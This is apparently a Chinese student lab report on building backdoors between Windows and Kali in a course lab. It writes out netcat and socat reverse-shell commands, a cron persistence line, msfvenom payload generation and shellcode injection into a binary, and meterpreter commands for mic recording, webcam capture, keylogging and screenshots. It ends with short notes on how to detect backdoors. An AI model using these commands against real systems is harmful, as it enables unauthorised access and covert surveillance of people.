Exp2-后门原理与实践
一、实践目标
- 使用netcat实现win,kali间的后门连接
- 使用socat实现win,kali间的后门连接
- meterpreter的应用
二、实验过程
1.使用netcat获取主机操作Shell,cron启动
(1)Windows获取kali的shell
命令行输入ipconfig获取Windows的主机IP
主机IP为192.168.1.5
在主机中输入ncat.exe -l -p 1202 监听本机端口1202
在kali中输入nc 192.168.1.5 1202 -e /bin/sh 连接主机反弹shell
在Windows中返回kali的shell
(2)kali获取Windows的shell
输入ifconfig获取kali的IP
在虚拟机中用nc -l -p 1202
监听主机1202端口
主机输入ncat -e cmd 192.168.1.7 1202进行反弹连接
成功获取主机shell
(3)启动cron并在主机监听
在最后一行添加49 * * * * /bin/netcat 192.168.1.5 1202 -e /bin/sh
,即在每个小时的第49分钟反向连接Windows主机的1202端口
在主机中输入ncat -l -p 1202,等到指定时间就能获取kali的shell
2.使用socat获取主机操作Shell, 任务计划启动
在Windows中打开计算机管理,使用任务计划程序新建任务
新建触发器
新建操作,输入参数“tcp-listen:1202 exec:cmd.exe,pty,stderr”
在kali中输入
socat - tcp:192.168.1.5:1202
成功获取shell
3.使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
输入
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=1202 -f exe > 20191202.exe
生成20191202.exe
在Windows上打开监听
在Kali上用nc 192.168.1.5 1202 < 20191202.exe
将生成的20191202.exe
后门程序传过去
在kali中输入msfconsole,并依次输入
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.1.7 set LPORT 1202
通过show option查看配置后的情况
输入exploit进行监听,Windows中打开20191202.exe,成功获取shell
4.使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
(1)获取主机音频
输入record_mic
指令进行录音(-d
可设置时长)
(2)获取主机摄像头
输入webcam_snap
指令控制摄像头进行拍照
输入run webcam
可以进行屏幕录制,相当于不间断地用摄像头拍照片,并不断存储在一个jpg中
(3)获取击键记录
输入keyscan_start
开始捕获键盘记录,keyscan_dump
获取击键记录(-d
可设置时长)
(4)获取主机截屏
使用screenshot
指令可以进行截屏
5.使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=1202 -x pwn1 -f elf > 20191202-pwn
输入msfconsole
进入MSF控制台依次输入
use exploit/multi/handler set payload linux/x86/meterpreter/reverse_tcp set LHOST 192.168.1.7 set LPORT 1202
输入exploit进行监听
在另一个终端打开20191202-pwn,需要先修改权限
成功getshell
三、基础问题回答
1.例举你能想到的一个后门进入到你系统中的可能方式?
在非正规渠道下载软件;在电脑中插入无法判断是否安全的U盘;扫来读不明的二维码。
2.例举你知道的后门如何启动起来(win及linux)的方式?
win:在重启电脑时自动启动;与某些程序、插件捆绑,当启动这些程序、插件时就启动。
Linux:通过定时任务启动;与一些程序捆绑启动。
3.Meterpreter有哪些给你映像深刻的功能?
截屏、获取键盘敲击记录、打开摄像头
4.如何发现自己有系统有没有被安装后门?
通过杀毒软件进行全盘扫描;打开任务管理器看看那些运行的进程;通过应用历史记录查看应用的使用记录。
四、实验体会
本次实验让我对后门程序有了一定的了解,虽然这个后门程序只有在关闭杀毒软件的情况下才能生效,但当我通过Meterpreter获得主机的权限时,就感受到了网络对抗这门课的魅力,就像打开新世界的大门一样。在实验中,我也因为输错一些指令而遇到麻烦,另一些问题也在云班课的讨论区获得了答案。在用MFS生成shellcode注入pwn中时,因为监听环境从windows变成Linux,所以“set payload windows/meterpreter/reverse_tcp”这条指令需要修改。但我当时没注意这个地方,导致最后一直在获取Windows的shell,因此做实验时还需要认真。